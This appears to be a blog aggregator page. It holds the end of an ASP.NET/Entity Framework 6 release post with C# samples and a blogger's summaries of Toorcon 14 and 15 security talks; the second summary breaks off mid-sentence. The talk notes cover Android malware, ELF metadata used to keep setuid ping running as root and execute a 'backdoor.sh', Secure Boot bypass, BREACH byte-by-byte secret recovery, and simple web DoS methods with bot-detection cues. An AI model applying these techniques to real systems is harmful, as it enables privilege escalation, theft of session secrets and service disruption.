    ASP.NET Identity is a new membership system for ASP.NET applications that we are introducing with this release. ASP.NET Identity makes it easy to integrate user-specific profile data with application data. ASP.NET Identity also allows you to choose the persistence model for user profiles in your application. You can store the data in a SQL Server database or another data store, including NoSQL data stores such as Windows Azure Storage Tables. ASP.NET Identity also supports claims-based authentication, where the user's identity is represented as a set of claims from a trusted issuer. Users can log in by creating an account on the website using a username and password, or they can log in using social identity providers (such as Microsoft Account, Twitter, Facebook, Google) or using organizational accounts through Windows Azure Active Directory or Active Directory Federation Services (ADFS). To learn more about how to use ASP.NET Identity visit http://www.asp.net/identity.

    ASP.NET Web API 2

    ASP.NET Web API 2 has a bunch of great improvements, including:

    Attribute routing: ASP.NET Web API now supports attribute routing, thanks to a contribution by Tim McCall, the author of http://attributerouting.net. With attribute routing you can specify your Web API routes by annotating your actions and controllers (see the sketch at the end of this section).

    OAuth 2.0 support: The Web API and Single Page Application project templates now support authorization using OAuth 2.0. OAuth 2.0 is a framework for authorizing client access to protected resources. It works for a variety of clients including browsers and mobile devices.

    OData improvements: ASP.NET Web API also now provides support for OData endpoints and enables support for both ATOM and JSON-light formats. With OData you get support for rich query semantics, paging, $metadata, CRUD operations, and custom actions over any data source. Specific enhancements in ASP.NET Web API 2 OData include:
    * support for $select, $expand, $batch, and $value
    * improved extensibility
    * type-less support
    * reuse of an existing model

    OWIN integration: ASP.NET Web API now fully supports OWIN and can be run on any OWIN-capable host. With OWIN integration, you can self-host Web API in your own process alongside other OWIN middleware, such as SignalR. For more information, see Use OWIN to Self-Host ASP.NET Web API.

    More Web API improvements: In addition to the features above there have been a host of other improvements in ASP.NET Web API, including:
    * CORS support
    * authentication filters
    * filter overrides
    * improved unit testability
    * a portable ASP.NET Web API client

    To learn more go to http://www.asp.net/web-api/
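    The original post showed the attribute routing annotations in a screenshot that did not survive here, so the following is a representative sketch rather than the post's exact code (the controller, route templates, and data are illustrative; attribute routing also has to be enabled with config.MapHttpAttributeRoutes() in the Web API configuration):

    using System.Collections.Generic;
    using System.Web.Http;

    [RoutePrefix("api/books")]
    public class BooksController : ApiController
    {
        // Handles GET /api/books/5/authors
        [Route("{bookId:int}/authors")]
        public IEnumerable<string> GetAuthorsByBook(int bookId)
        {
            return new[] { "Author One", "Author Two" };
        }
    }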
    ASP.NET SignalR 2

    ASP.NET SignalR is a library for ASP.NET developers that dramatically simplifies the process of adding real-time web functionality to your applications. Real-time web functionality is the ability to have server-side code push content to connected clients instantly as it becomes available. SignalR 2.0 introduces a ton of great improvements. We've added support for Cross-Origin Resource Sharing (CORS) to SignalR 2.0. iOS and Android support for SignalR have also been added using the MonoTouch and MonoDroid components from the Xamarin library (for more information on how to use these additions, see the article Using Xamarin Components from the SignalR wiki). We've also added support for the Portable .NET Client in SignalR 2.0 and created a new self-hosting package. This change makes the setup process for SignalR much more consistent between web-hosted and self-hosted SignalR applications. To learn more go to http://www.asp.net/signalr.

    ASP.NET MVC 5

    The ASP.NET MVC project templates integrate seamlessly with the new One ASP.NET experience and enable you to integrate all of the above ASP.NET Web API, SignalR and Identity improvements. You can also customize your MVC project and configure authentication using the One ASP.NET project creation wizard. The MVC templates have also been updated to use ASP.NET Identity and Bootstrap as well. An introductory tutorial to ASP.NET MVC 5 can be found at Getting Started with ASP.NET MVC 5. This release of ASP.NET MVC also supports several nice new MVC-specific features, including:
    * Authentication filters: these filters allow you to specify authentication logic per-action, per-controller, or globally for all controllers.
    * Attribute routing: allows you to define your routes on actions or controllers.

    To learn more go to http://www.asp.net/mvc

    Entity Framework 6 Improvements

    Visual Studio 2013 ships with Entity Framework 6, which brings a lot of great new features to the data access space:

    Async and Task<T> Support

    EF6's new async query and save support enables you to perform asynchronous data access and take advantage of the Task<T> support introduced in .NET 4.5 within data access scenarios. This allows you to free up threads that might otherwise be blocked on data access requests, and enables them to be used to process other requests while you wait for the database engine to process operations. When the database server responds, the thread will be re-queued within your ASP.NET application and execution will continue. This enables you to easily write significantly more scalable server code. An example ASP.NET Web API action that makes use of the new EF6 async query methods appears in the first sketch below.

    Interception and Logging

    Interception and SQL logging allow you to view – or even change – every command that is sent to the database by Entity Framework. This includes a simple, human-readable log – which is great for debugging – as well as some lower-level building blocks that give you access to the commands and results. Wiring the simple log up to Debug in the constructor of an MVC controller is shown in the second sketch below.

    Custom Code First Conventions

    The new custom Code First conventions enable bulk configuration of a Code First model – reducing the amount of code you need to write and maintain. Conventions are great when your domain classes don't match the Code First conventions. For example, a convention can configure all properties that are called 'Key' to be the primary key of the entity they belong to (third sketch below). This is different than the default Code First convention that expects Id or <type name>Id.
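    The original post illustrated these three EF6 features with screenshots of code that did not survive here; the following are representative sketches rather than the post's exact code (context, entity, and controller names such as StoreContext and Product are illustrative). First, an async Web API action using EF6's async query methods:

    using System.Collections.Generic;
    using System.Data.Entity;
    using System.Threading.Tasks;
    using System.Web.Http;

    public class ProductsController : ApiController
    {
        private readonly StoreContext db = new StoreContext();

        // The request thread is returned to the pool while the query runs;
        // execution resumes here when the database responds.
        public async Task<IList<Product>> GetProducts()
        {
            return await db.Products.ToListAsync();
        }
    }

    Second, wiring the simple log up to debug output in an MVC controller's constructor:

    public class HomeController : Controller
    {
        private readonly StoreContext db = new StoreContext();

        public HomeController()
        {
            // Every SQL command EF sends is written to the debug output window.
            db.Database.Log = s => System.Diagnostics.Debug.Write(s);
        }
    }

    Third, a custom Code First convention that makes any property named "Key" the primary key of its entity:

    public class StoreContext : DbContext
    {
        public DbSet<Product> Products { get; set; }

        protected override void OnModelCreating(DbModelBuilder modelBuilder)
        {
            // Replace the default Id / <type name>Id convention with "Key".
            modelBuilder.Properties()
                        .Where(p => p.Name == "Key")
                        .Configure(p => p.IsKey());
        }
    }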
    Connection Resiliency

    The new Connection Resiliency feature in EF6 enables you to register an execution strategy to handle – and potentially retry – failed database operations. This is especially useful when deploying to cloud environments where dropped connections become more common as you traverse load balancers and distributed networks. EF6 includes a built-in execution strategy for SQL Azure that knows about retryable exception types and has some sensible – but overridable – defaults for the number of retries and the time between retries when errors occur. Registering it is simple using the new code-based configuration support. These are just some of the new features in EF6. You can visit the release notes section of the Entity Framework site for a complete list of new features.

    Microsoft OWIN Components

    Open Web Interface for .NET (OWIN) defines an open abstraction between .NET web servers and web applications, and the ASP.NET "Katana" project brings this abstraction to ASP.NET. OWIN decouples the web application from the server, making web applications host-agnostic. For example, you can host an OWIN-based web application in IIS or self-host it in a custom process. For more information about OWIN and Katana, see What's new in OWIN and Katana.

    Summary

    Today's Visual Studio 2013, ASP.NET and Entity Framework release delivers some fantastic new features that streamline your web development lifecycle. These features span from server framework to data access to tooling to client-side HTML development. They also integrate some great open-source technology and contributions from our developer community. Download and start using them today! Scott

    P.S. In addition to blogging, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/scottgu

    Read the article

  • Toorcon 14

    - by danx
    Toorcon 2012 Information Security Conference San Diego, CA, http://www.toorcon.org/ Dan Anderson, October 2012

    It's almost Halloween, and we all know what that means—yes, of course, it's time for another Toorcon Conference! Toorcon is an annual conference for people interested in computer security. This includes the whole range of hackers, computer hobbyists, professionals, security consultants, press, law enforcement, prosecutors, FBI, etc. We're at Toorcon 14—see earlier blogs for some of the previous Toorcons I've attended (back to 2003). This year's "con" was held at the Westin on Broadway in downtown San Diego, California. The following are not necessarily my views—I'm just the messenger—although I could have misquoted or misparaphrased the speakers. Also, I only reviewed some of the talks, below, which I attended and which interested me.

    * MalAndroid—the Crux of Android Infections, Aditya K. Sood
    * Programming Weird Machines with ELF Metadata, Rebecca "bx" Shapiro
    * Privacy at the Handset: New FCC Rules?, Valkyrie
    * Hacking Measured Boot and UEFI, Dan Griffin
    * You Can't Buy Security: Building the Open Source InfoSec Program, Boris Sverdlik
    * What Journalists Want: The Investigative Reporters' Perspective on Hacking, Dave Maas & Jason Leopold
    * Accessibility and Security, Anna Shubina
    * Stop Patching, for Stronger PCI Compliance, Adam Brand
    * McAfee Secure & Trustmarks — a Hacker's Best Friend, Jay James & Shane MacDougall

    MalAndroid—the Crux of Android Infections
    Aditya K. Sood, IOActive, Michigan State PhD candidate

    Aditya talked about Android smartphone malware. There's a lot of old Android software out there—over 50% Gingerbread (2.3.x)—and most of it has unpatched vulnerabilities. Of 9 Android vulnerabilities, 8 have known exploits (such as the old Gingerbread Global Object Table exploit). Android protection includes sandboxing, a security scanner, app permissions, and a screened Android app market. The Android permission checker has fine-grained resource control and policy enforcement. Android static analysis also includes a static analysis app checker ("bouncer") and a vulnerability checker.

    What security problems does Android have?
    * User-centric security, which depends on the user to grant permission and make smart decisions. But users don't care or think about malware (they're not aware, not paranoid). All they want is functionality, extensibility, mobility.
    * Android had no "proper" encryption before Android 3.0.
    * No built-in protection against social engineering and web tricks.
    * Alternative Android app markets are unsafe. Simply visiting some markets can infect Android.

    Aditya classified Android malware types as:
    * Type A—Apps. These interact with the Android app framework. For example, a fake Netflix app. Or Android Gold Dream (a game), which uploads user files in a stealthy manner to a remote location.
    * Type K—Kernel. Exploits underlying Linux libraries or the kernel.
    * Type H—Hybrid. These use multiple layers (app framework, libraries, kernel). These are most commonly used by Android botnets, which are popular with Chinese botnet authors.

    What are the threats from Android malware? These include leaking info (contacts), banking fraud, corporate network attacks, malware advertising, and malware "hacktivism" (the promotion of social causes—for example, promoting specific leaders of the Tunisian or Iranian revolutions). Android malware is frequently "masquerated", that is, repackaged inside a legit app along with malware. To avoid detection, the hidden malware is not unwrapped until runtime. The malware payload can be hidden in, for example, PNG files.

    Less common are Android bootkits—there aren't many around. What they do is hijack the Android init framework—altering system programs and daemons—and then delete themselves. For example, the DKF Bootkit (China).

    Android app problems:
    * no code signing! all self-signed
    * native code execution
    * permission sandbox — all or none
    * alternate marketplaces
    * no robust Android malware detection at the network level
    * delayed patch process

    Programming Weird Machines with ELF Metadata
    Rebecca "bx" Shapiro, Dartmouth College, NH
    https://github.com/bx/elf-bf-tools
    @bxsays on twitter

    Definitions. "ELF" is an executable file format used in linking and loading executables (on UNIX/Linux-class machines). A "weird machine" uses undocumented computation sources (think of them as unintended virtual machines). Some examples of "weird machines" are those that return to a weird location, do SQL injection, or corrupt the heap.

    Bx then talked about using ELF metadata as an (unintended) "weird machine". Some ELF background: a compiler takes source code and generates an ELF object file (hello.o). A static linker makes an ELF executable from the object file. A runtime linker and loader takes the ELF executable and loads and relocates it in memory. The ELF file has symbols to relocate functions and variables. ELF has two relocation tables—one used at link time and another at loading time: .rela.dyn (link time) and .dynsym (dynamic table). GOT: Global Offset Table of addresses for dynamically-linked functions. PLT: Procedure Linkage Table—works with the GOT. The memory layout of a process (not the ELF file) is, in order: program (+ heap), dynamic libraries, libc, ld.so, stack (which includes the dynamic table loaded into memory).

    For ELF, the "weird machine" is found and exploited in the loader. ELF can be crafted for executing viruses by tricking the runtime into executing interpreted "code" in the ELF symbol table. One can inject parasitic "code" without modifying the actual ELF code portions. Think of the ELF symbol table as an "assembly language" interpreter. It has these elements:
    * instructions: add, move, jump if not 0 (jnz)
    * symbol table entries act as "registers"
    * a symbol table value is "contents"
    * immediate values are constants
    * direct values are addresses (e.g., 0xdeadbeef)
    * move instruction: a relocation table entry
    * add instruction: a relocation table "addend" entry
    * jnz instruction: takes multiple relocation table entries

    The ELF weird machine exploits the loader by relocating relocation table entries. The loader will go on forever until told to stop. It stores state on the stack at the "end" and uses IFUNC table entries (containing function pointer addresses). The ELF weird machine, called "Brainfu*k" (BF), has 8 instructions (pointer inc, dec, inc indirect, dec indirect, jump forward, jump backward, print) and 3 registers.

    Bx showed example BF source code that implemented a Turing machine printing "hello, world". More interesting was the next demo, where bx modified ping. Ping runs suid as root, but quickly drops privilege. BF modified the loader to disable the library function call that drops privilege, so ping remained root. Then BF modified the ping -t argument to execute the -t filename as root. It's best to show what this modified ping does with an example:

    $ whoami
    bx
    $ ping localhost -t backdoor.sh   # executes backdoor
    $ whoami
    root
    $

    The modified code increased from 285948 bytes to 290209 bytes. A BF tool compiles an "executable" by modifying the symbol table in an existing ELF executable. The tool modifies the .dynsym and .rela.dyn tables, but not code or data.

    Privacy at the Handset: New FCC Rules?
    "Valkyrie" (Christie Dudley, Santa Clara Law JD candidate)

    Valkyrie talked about mobile handset privacy. Some background: Senator Franken (also a comedian) became alarmed about CarrierIQ, where the carriers track their customers. Franken asked the FCC to find out what obligations carriers think they have to protect privacy. The carriers' response was that they are doing just fine with self-regulation—no worries! Carriers need to collect data, such as missed calls, to maintain network quality. But carriers also sell data for marketing. Verizon sells customer data and enables this with a narrow privacy policy (only 1 month to opt out, with difficulties). The data sold is not individually identifiable and is aggregated. But Verizon recommends, as an aggregation workaround, "recollating" data with other databases to identify customers indirectly.

    The FCC has regulated telephone privacy since 1934 and mobile network privacy since 2007. Also, the carriers say mobile phone privacy is an FTC responsibility (not the FCC's). The FTC is trying to improve mobile app privacy, but it has no authority over carrier/customer relationships. As a side note, Apple iPhones are unique in that carriers have extra control over iPhones that they don't have with other smartphones. As a result iPhones may be more regulated.

    Who are the consumer advocates? Everyone knows the EFF, but EPIC (Electronic Privacy Information Center), although more obscure, is more relevant.

    What to do? Carriers must be accountable, with opt-in and opt-out at any time. Carriers need an incentive to grant users control for those who want it, by holding them liable and responsible for breaches on their watch. Location information should be added to current CPNI privacy protection, and should require a "pen/trap" judicial order to obtain (which would still be a lower standard than the 4th Amendment). Politics are on a pro-privacy swing now, with many senators and the White House. There will probably be new regulation soon, and enforcement will be a problem, but consumers will still see some benefit.

    Hacking Measured Boot and UEFI
    Dan Griffin, JWSecure, Inc., Seattle, @JWSdan

    Dan talked about hacking measured UEFI boot. First some terms:
    * UEFI is a boot technology that is replacing BIOS (it has whitelisting and blacklisting). UEFI protects devices against rootkits.
    * TPM - a hardware security device to store hashes and hardware-protected keys
    * "secure boot" - can control at the firmware level what boot images can boot
    * "measured boot" - an OS feature that tracks hashes (from BIOS, boot loader, kernel, early drivers)
    * "remote attestation" - allows remote validation and control based on policy on a remote attestation server

    Microsoft is pushing TPM (Windows 8 required), but Google is not. Intel TianoCore is the only open source implementation of UEFI. Dan has a Measured Boot Tool at http://mbt.codeplex.com/ with a demo where you can also view TPM data. TPM support is already on enterprise-class machines.

    UEFI weaknesses. UEFI toolkits are evolving rapidly, but UEFI has weaknesses:
    * it assumes the user is an ally
    * it trusts the TPM implicitly, and assumes it is attached to the computer
    * the hibernate file is unprotected (disk encryption protects against this)
    * protection is migrating from hardware to firmware
    * delays in patching and whitelist updates
    * will UEFI really be adopted by the mainstream (smartphone hardware support, bank support, apathetic consumer support)?

    You Can't Buy Security: Building the Open Source InfoSec Program
    Boris Sverdlik, ISDPodcast.com co-host

    Boris talked about problems typical of current security audits. "IT Security" is an oxymoron—IT exists to enable business, uptime, utilization, and reporting, but doesn't care about security—IT has a conflict of interest. There's no magic bullet ("blinky box"), no one-size-fits-all solution (e.g., Intrusion Detection Systems (IDSs)). Regulations don't make you secure. The cloud is not secure (because of shared data and admin access). Defense and pen testing is not sexy. Auditors are not the solution (security is not a checklist)—what's needed is experience and adaptability—soft skills.

    Step 1: The first thing is to Google and learn the company end-to-end before you start. Get to know the management team (not the IT team), and meet as many people as you can. Don't use arbitrary values such as CISSP scores. Quantitative risk assessment is a myth (e.g., AV * EF = SLE). Learn the different business units and legal/regulatory obligations, learn the business and where the money is made, verify the company is protected from script kiddies (easy), learn the sensitive information (IP, internal use only), and start with low-hanging fruit (customer service reps and social engineering).

    Step 2: Policies. Keep policies short and relevant. Generic SANS "security" boilerplate policies don't make sense and are not followed. Focus on acceptable use, data usage, communications, and physical security.

    Step 3: Implementation: keep it simple, stupid. Open source, although useful, is not free (implementation cost).
    * Access controls, with authentication & authorization for local and remote access. MS Windows has it; otherwise use OpenLDAP, OpenIAM, etc.
    * Application security: Everyone tries to reinvent the wheel—use existing static analysis tools. Review high-risk apps and major revisions. Don't run apps of different risk levels on the same system. Assume the host/client is compromised and use app-level security controls.
    * Network security: VLAN != segregated, because there are too many workarounds. Use explicit firewall rules, active and passive network monitoring (snort is free), disallow end-user access to the production environment, and have a proxy instead of direct Internet access. Also, SSL certificates are not good two-factor auth, and SSL does not mean "safe."
    * Operational controls: Have change, patch, asset, & vulnerability management (OSSI is free). For change management, always review code before pushing to production. For logging, have centralized security logging for business-critical systems, separate security logging from administrative/IT logging, and lock down the logs (they have everything). Monitor with OSSIM (open source). Use intrusion detection, but not just to fulfill a checkbox: build rules from a whitelist perspective (snort). OSSEC has 95% of what you need. Vulnerability management is a QA function when done right: OpenVAS and Seccubus are free.
    * Security awareness: The reality is users will always click everything. Build real awareness, not a compliance-driven checkbox, and have it integrated into the culture. Pen test by crowdsourcing—test with logging.

    COSSP http://www.cossp.org/ - Comprehensive Open Source Security Project

    What Journalists Want: The Investigative Reporters' Perspective on Hacking
    Dave Maas, San Diego CityBeat
    Jason Leopold, Truthout.org

    The difference between hackers and investigative journalists: for hackers, the motivation varies, but the method is the same, with technological specialties. For investigative journalists, it's about one thing—The Story—and they need broad info-gathering skills.

    J-School in 60 seconds. Generic formula: a person or issue of public interest, new info, or a new angle. Generic criteria: proximity, prominence, timeliness, human interest, oddity, or consequence.

    Media awareness of hackers and trends: journalists are becoming extremely aware of hackers, with congressional debates (privacy, data breaches), demand for data-mining journalists, use of coding and web development by journalists, and journalists busted for hacking (Murdoch).

    Info gathering by investigative journalists includes public records laws. The federal Freedom of Information Act (FOIA) is good, but slow. The California Public Records Act is a lot stronger. FOIA takes forever because of foot-dragging—it helps to be specific. They often need to sue (especially the FBI). CPRA is faster, and requests can be vague. There are also dumps and leaks (a la Wikileaks).

    Journalists want: leads, protecting themselves and their sources, and adapting tools for news gathering (Google hacking). Anonymity is important to whistleblowers. They want no digital footprint left behind (e.g., email, web log). They don't trust encryption; they want to feel safe and secure. Whistleblower laws are very weak—there's no upside for whistleblowers—they have to be very passionate to do it.

    Accessibility and Security or: How I Learned to Stop Worrying and Love the Halting Problem
    Anna Shubina, Dartmouth College

    Anna talked about how accessibility and security are related. This is about accessibility of digital content (not real-world accessibility); for our purposes it mostly refers to blind users and screen readers. Accessibility is about parsing documents, as are many security issues. "Rich" executable content causes accessibility to fail, and often causes security to fail. For example, MS Word has an executable format—it's not a document exchange format—and is more dangerous than PDF or HTML. Accessibility is often the first, and maybe the only, sanity check on parsing. There's no choice about it, because someone may want to read what you write. Google, for example, is very particular about which web browser you use and is bad at supporting other browsers. It uses JavaScript instead of links, often requiring mouseover to display content.

    PDF is a security nightmare: an executable format with embedded Flash, JavaScript, etc., and 15 million lines of code. Google Chrome doesn't handle PDF correctly, causing several security bugs. PDF has an accessibility checker and PDF tagging to help with accessibility. But no PDF checker checks for incorrect tags or untagged content, or validates lists or tables. None check executable content at all.

    The "Halting Problem" is: can one decide whether a program will ever stop? The answer, in general, is no (Rice's theorem). The same holds true for accessibility checkers. Language-theoretic security says complicated data formats are hard to parse, and the problem cannot be solved in general due to the Halting Problem.

    W3C Web Accessibility Guidelines: "Perceivable, Operable, Understandable, Robust". Not much help though, except for "Robust", but here's some gems:
    * all information should be parsable (paraphrasing)
    * if not parsable, it cannot be converted to alternate formats
    * maximize compatibility in new document formats

    Executable web pages are bad for security and accessibility. They say it's for a better web experience. But is it necessary to stuff web pages with JavaScript for a better experience? A good example is The Drudge Report—it has hand-written HTML with no JavaScript, yet drives a lot of web traffic due to good content. A bad example is Google News—hidden scrollbars, guessing user input.

    Solutions:
    * accessibility and security problems come from the same source
    * expose the "better user experience" myth
    * keep your corner of the Internet parsable
    * remember the "Halting Problem"—recognize false solutions (checking and verifying tools)

    Stop Patching, for Stronger PCI Compliance
    Adam Brand, protiviti @adamrbrand, http://www.picfun.com/

    Adam talked about PCI compliance for retail sales. Take an example: for PCI compliance, 50% of the time of Brian (an IT guy)—960 hours/year—was spent patching POSs in 850 restaurants. Often applying some patches makes no sense (like fixing a browser vulnerability on a server). "Scanner worship" is the overuse of vulnerability scanners—it gives a warm and fuzzy feeling and it's simple (red or green results—fix the reds). Scanners give a false sense of security. In reality, breaches from missing patches are uncommon—more common problems are default passwords, cleartext authentication, and misconfiguration (open firewall ports).

    Patching myths:
    * Myth 1: install within 30 days of patch release (but PCI §6.1 allows a "risk-based approach" instead).
    * Myth 2: the vendor decides what's critical (also PCI §6.1). But §6.2 requires user ranking of vulnerabilities instead.
    * Myth 3: scan and rescan until it passes. But PCI §11.2.1b says this applies only to high-risk vulnerabilities.

    Adam says good recommendations come from NIST 800-40. Instead, use sane patching and focus on what's really important. From NIST 800-40:
    * Proactive: use a proactive vulnerability management process: change control, configuration management, file integrity monitoring.
    * Monitor: start with NVD and other vulnerability alerts, not scanner results.
    * Evaluate: public-facing system? workstation? internal server? (risk rank)
    * Decide: on action and timeline.
    * Test: pre-test patches (stability, functionality, rollback) for change control.
    * Install: notify, change control, tickets.

    McAfee Secure & Trustmarks — a Hacker's Best Friend
    Jay James, Shane MacDougall, Tactical Intelligence Inc., Canada

    "McAfee Secure Trustmark" is a website seal marketed by McAfee. A website gets this badge if it passes their remote scanning. The problem is that the removal of a trustmark acts as a flag that you're vulnerable, and it's easy to view status changes by viewing the McAfee list on their website or on Google. "Secure TrustGuard" is similar to McAfee. Jay and Shane wrote Perl scripts to gather sites from McAfee and search engines. If a site's certification image changes to a 1x1 pixel image, the site is no longer certified. Their scripts take deltas of scans to see what changed daily. The bottom line is that a change in TrustGuard status is a flag for hackers to attack your site. The entire idea of seals is silly—you're raising a flag announcing when you're vulnerable.

    Read the article

  • Toorcon 15 (2013)

    - by danx
    The Toorcon gang (senior staff): h1kari (founder), nfiltr8, and Geo Introduction to Toorcon 15 (2013) A Tale of One Software Bypass of MS Windows 8 Secure Boot Breaching SSL, One Byte at a Time Running at 99%: Surviving an Application DoS Security Response in the Age of Mass Customized Attacks x86 Rewriting: Defeating RoP and other Shinanighans Clowntown Express: interesting bugs and running a bug bounty program Active Fingerprinting of Encrypted VPNs Making Attacks Go Backwards Mask Your Checksums—The Gorry Details Adventures with weird machines thirty years after "Reflections on Trusting Trust" Introduction to Toorcon 15 (2013) Toorcon 15 is the 15th annual security conference held in San Diego. I've attended about a third of them and blogged about previous conferences I attended here starting in 2003. As always, I've only summarized the talks I attended and interested me enough to write about them. Be aware that I may have misrepresented the speaker's remarks and that they are not my remarks or opinion, or those of my employer, so don't quote me or them. Those seeking further details may contact the speakers directly or use The Google. For some talks, I have a URL for further information. A Tale of One Software Bypass of MS Windows 8 Secure Boot Andrew Furtak and Oleksandr Bazhaniuk Yuri Bulygin, Oleksandr ("Alex") Bazhaniuk, and (not present) Andrew Furtak Yuri and Alex talked about UEFI and Bootkits and bypassing MS Windows 8 Secure Boot, with vendor recommendations. They previously gave this talk at the BlackHat 2013 conference. MS Windows 8 Secure Boot Overview UEFI (Unified Extensible Firmware Interface) is interface between hardware and OS. UEFI is processor and architecture independent. Malware can replace bootloader (bootx64.efi, bootmgfw.efi). Once replaced can modify kernel. Trivial to replace bootloader. Today many legacy bootkits—UEFI replaces them most of them. MS Windows 8 Secure Boot verifies everything you load, either through signatures or hashes. UEFI firmware relies on secure update (with signed update). You would think Secure Boot would rely on ROM (such as used for phones0, but you can't do that for PCs—PCs use writable memory with signatures DXE core verifies the UEFI boat loader(s) OS Loader (winload.efi, winresume.efi) verifies the OS kernel A chain of trust is established with a root key (Platform Key, PK), which is a cert belonging to the platform vendor. Key Exchange Keys (KEKs) verify an "authorized" database (db), and "forbidden" database (dbx). X.509 certs with SHA-1/SHA-256 hashes. Keys are stored in non-volatile (NV) flash-based NVRAM. Boot Services (BS) allow adding/deleting keys (can't be accessed once OS starts—which uses Run-Time (RT)). Root cert uses RSA-2048 public keys and PKCS#7 format signatures. SecureBoot — enable disable image signature checks SetupMode — update keys, self-signed keys, and secure boot variables CustomMode — allows updating keys Secure Boot policy settings are: always execute, never execute, allow execute on security violation, defer execute on security violation, deny execute on security violation, query user on security violation Attacking MS Windows 8 Secure Boot Secure Boot does NOT protect from physical access. Can disable from console. Each BIOS vendor implements Secure Boot differently. There are several platform and BIOS vendors. It becomes a "zoo" of implementations—which can be taken advantage of. Secure Boot is secure only when all vendors implement it correctly. 
Allow only UEFI firmware signed updates protect UEFI firmware from direct modification in flash memory protect FW update components program SPI controller securely protect secure boot policy settings in nvram protect runtime api disable compatibility support module which allows unsigned legacy Can corrupt the Platform Key (PK) EFI root certificate variable in SPI flash. If PK is not found, FW enters setup mode wich secure boot turned off. Can also exploit TPM in a similar manner. One is not supposed to be able to directly modify the PK in SPI flash from the OS though. But they found a bug that they can exploit from User Mode (undisclosed) and demoed the exploit. It loaded and ran their own bootkit. The exploit requires a reboot. Multiple vendors are vulnerable. They will disclose this exploit to vendors in the future. Recommendations: allow only signed updates protect UEFI fw in ROM protect EFI variable store in ROM Breaching SSL, One Byte at a Time Yoel Gluck and Angelo Prado Angelo Prado and Yoel Gluck, Salesforce.com CRIME is software that performs a "compression oracle attack." This is possible because the SSL protocol doesn't hide length, and because SSL compresses the header. CRIME requests with every possible character and measures the ciphertext length. Look for the plaintext which compresses the most and looks for the cookie one byte-at-a-time. SSL Compression uses LZ77 to reduce redundancy. Huffman coding replaces common byte sequences with shorter codes. US CERT thinks the SSL compression problem is fixed, but it isn't. They convinced CERT that it wasn't fixed and they issued a CVE. BREACH, breachattrack.com BREACH exploits the SSL response body (Accept-Encoding response, Content-Encoding). It takes advantage of the fact that the response is not compressed. BREACH uses gzip and needs fairly "stable" pages that are static for ~30 seconds. It needs attacker-supplied content (say from a web form or added to a URL parameter). BREACH listens to a session's requests and responses, then inserts extra requests and responses. Eventually, BREACH guesses a session's secret key. Can use compression to guess contents one byte at-a-time. For example, "Supersecret SupersecreX" (a wrong guess) compresses 10 bytes, and "Supersecret Supersecret" (a correct guess) compresses 11 bytes, so it can find each character by guessing every character. To start the guess, BREACH needs at least three known initial characters in the response sequence. Compression length then "leaks" information. Some roadblocks include no winners (all guesses wrong) or too many winners (multiple possibilities that compress the same). The solutions include: lookahead (guess 2 or 3 characters at-a-time instead of 1 character). Expensive rollback to last known conflict check compression ratio can brute-force first 3 "bootstrap" characters, if needed (expensive) block ciphers hide exact plain text length. Solution is to align response in advance to block size Mitigations length: use variable padding secrets: dynamic CSRF tokens per request secret: change over time separate secret to input-less servlets Future work eiter understand DEFLATE/GZIP HTTPS extensions Running at 99%: Surviving an Application DoS Ryan Huber Ryan Huber, Risk I/O Ryan first discussed various ways to do a denial of service (DoS) attack against web services. One usual method is to find a slow web page and do several wgets. Or download large files. 
Apache is not well suited at handling a large number of connections, but one can put something in front of it Can use Apache alternatives, such as nginx How to identify malicious hosts short, sudden web requests user-agent is obvious (curl, python) same url requested repeatedly no web page referer (not normal) hidden links. hide a link and see if a bot gets it restricted access if not your geo IP (unless the website is global) missing common headers in request regular timing first seen IP at beginning of attack count requests per hosts (usually a very large number) Use of captcha can mitigate attacks, but you'll lose a lot of genuine users. Bouncer, goo.gl/c2vyEc and www.github.com/rawdigits/Bouncer Bouncer is software written by Ryan in netflow. Bouncer has a small, unobtrusive footprint and detects DoS attempts. It closes blacklisted sockets immediately (not nice about it, no proper close connection). Aggregator collects requests and controls your web proxies. Need NTP on the front end web servers for clean data for use by bouncer. Bouncer is also useful for a popularity storm ("Slashdotting") and scraper storms. Future features: gzip collection data, documentation, consumer library, multitask, logging destroyed connections. Takeaways: DoS mitigation is easier with a complete picture Bouncer designed to make it easier to detect and defend DoS—not a complete cure Security Response in the Age of Mass Customized Attacks Peleus Uhley and Karthik Raman Peleus Uhley and Karthik Raman, Adobe ASSET, blogs.adobe.com/asset/ Peleus and Karthik talked about response to mass-customized exploits. Attackers behave much like a business. "Mass customization" refers to concept discussed in the book Future Perfect by Stan Davis of Harvard Business School. Mass customization is differentiating a product for an individual customer, but at a mass production price. For example, the same individual with a debit card receives basically the same customized ATM experience around the world. Or designing your own PC from commodity parts. Exploit kits are another example of mass customization. The kits support multiple browsers and plugins, allows new modules. Exploit kits are cheap and customizable. Organized gangs use exploit kits. A group at Berkeley looked at 77,000 malicious websites (Grier et al., "Manufacturing Compromise: The Emergence of Exploit-as-a-Service", 2012). They found 10,000 distinct binaries among them, but derived from only a dozen or so exploit kits. Characteristics of Mass Malware: potent, resilient, relatively low cost Technical characteristics: multiple OS, multipe payloads, multiple scenarios, multiple languages, obfuscation Response time for 0-day exploits has gone down from ~40 days 5 years ago to about ~10 days now. So the drive with malware is towards mass customized exploits, to avoid detection There's plenty of evicence that exploit development has Project Manager bureaucracy. They infer from the malware edicts to: support all versions of reader support all versions of windows support all versions of flash support all browsers write large complex, difficult to main code (8750 lines of JavaScript for example Exploits have "loose coupling" of multipe versions of software (adobe), OS, and browser. This allows specific attacks against specific versions of multiple pieces of software. Also allows exploits of more obscure software/OS/browsers and obscure versions. Gave examples of exploits that exploited 2, 3, 6, or 14 separate bugs. 
However, these complete exploits are more likely to be buggy or fragile in themselves and easier to defeat. Future research includes normalizing malware and Javascript. Conclusion: The coming trend is that mass-malware with mass zero-day attacks will result in mass customization of attacks. x86 Rewriting: Defeating RoP and other Shinanighans Richard Wartell Richard Wartell The attack vector we are addressing here is: First some malware causes a buffer overflow. The malware has no program access, but input access and buffer overflow code onto stack Later the stack became non-executable. The workaround malware used was to write a bogus return address to the stack jumping to malware Later came ASLR (Address Space Layout Randomization) to randomize memory layout and make addresses non-deterministic. The workaround malware used was to jump t existing code segments in the program that can be used in bad ways "RoP" is Return-oriented Programming attacks. RoP attacks use your own code and write return address on stack to (existing) expoitable code found in program ("gadgets"). Pinkie Pie was paid $60K last year for a RoP attack. One solution is using anti-RoP compilers that compile source code with NO return instructions. ASLR does not randomize address space, just "gadgets". IPR/ILR ("Instruction Location Randomization") randomizes each instruction with a virtual machine. Richard's goal was to randomize a binary with no source code access. He created "STIR" (Self-Transofrming 